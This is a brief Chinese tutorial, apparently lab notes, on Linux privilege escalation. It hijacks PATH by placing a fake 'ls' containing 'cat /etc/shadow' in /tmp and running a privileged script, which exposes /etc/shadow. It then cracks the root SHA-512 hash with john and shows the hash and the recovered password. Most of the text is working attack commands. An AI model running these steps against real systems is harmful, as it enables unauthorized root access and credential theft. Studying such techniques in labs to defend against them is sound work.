通过读取密码文件shadow来破解root用户的口令实现提权
通过读取密码文件/etc/shadow来破解root用户的口令
ls -l /etc/shadow 普通用户无查看shadow权限
echo "cat /etc/shadow" >/tmp/ls chmod 755 /tmp/ls export PATH=/tmp:$PATH /home/user5/script
看到了root密码信息,第二部分为root密码hash
接下来对root密码进行破解
hash密码破解工具hashcat
john密码破解工具 (默认字典文件)
echo "root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1" > hash .txt
注意要用单引号!
使用john破解:
root采用了弱口令,密码为12345
显示破解的密码john --show hash.txt
